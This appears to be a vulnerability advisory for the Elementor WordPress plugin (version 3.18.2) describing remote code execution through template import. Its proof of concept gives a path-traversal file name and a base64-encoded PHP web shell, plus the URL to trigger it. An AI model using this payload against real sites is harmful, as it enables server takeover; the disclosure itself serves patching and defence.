Description The plugin is vulnerable to Remote Code Execution via file upload via the template import functionality, allowing authenticated attackers, with contributor-level access and above, to upload files and execute code on the server.
1. Edit a post in Elementor. 2. Import a template (folder icon on an Elementor block). 3. Pick any JSON file, and intercept the AJAX request. 4. Replace the file name with “/…/…/…/…/shell.php” 5. Replace the base64 contents (fileData) with “PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKTsgPz4=” 6. Visit /wp-content/shell.php?cmd=id to see the RCE.
CPE | Name | Operator | Version |
---|---|---|---|
eq | 3.18.2 |